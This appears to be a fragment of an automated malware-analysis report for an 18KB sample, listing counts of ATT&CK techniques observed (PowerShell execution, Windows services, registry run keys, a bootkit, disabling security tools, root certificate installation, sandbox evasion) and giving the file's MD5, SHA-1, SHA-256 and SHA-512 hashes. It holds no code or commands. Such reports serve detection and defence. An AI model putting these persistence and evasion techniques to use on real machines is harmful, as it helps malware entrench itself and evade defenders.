Execution
- Command and Scripting Interpreter: 1
  - PowerShell: 1
- Scheduled Task/Job: 1
- System Services: 2
  - Service Execution: 2
Persistence
- Boot or Logon Autostart Execution: 1
  - Registry Run Keys / Startup Folder: 1
- Create or Modify System Process: 3
  - Windows Service: 3
- Pre-OS Boot: 1
  - Bootkit: 1
- Scheduled Task/Job: 1
Privilege Escalation
- Boot or Logon Autostart Execution: 1
  - Registry Run Keys / Startup Folder: 1
- Create or Modify System Process: 3
  - Windows Service: 3
- Scheduled Task/Job: 1
Defense Evasion
- Impair Defenses: 3
  - Disable or Modify Tools: 2
- Modify Registry: 5
- Pre-OS Boot: 1
  - Bootkit: 1
- Subvert Trust Controls: 1
  - Install Root Certificate: 1
- Virtualization/Sandbox Evasion: 2
Downloads
-
Filesize
18KB
MD530dca8b68825d5b3db7a685aa3da0a13
SHA107320822d14d6caf8825dd6d806c0cde398584f3
SHA256f2dc635cb5fe8b8815ea98d909b67016975ca8e5a43cb39e47595ecd01038a96
SHA512b5f3be086d3f7c751028d8d8a025069743b2472cec10252627f5583492383a5a865e88ad5839d83bf3a3c31b5b630753e77a2c02433d7fbe90aa11acd0f35f0c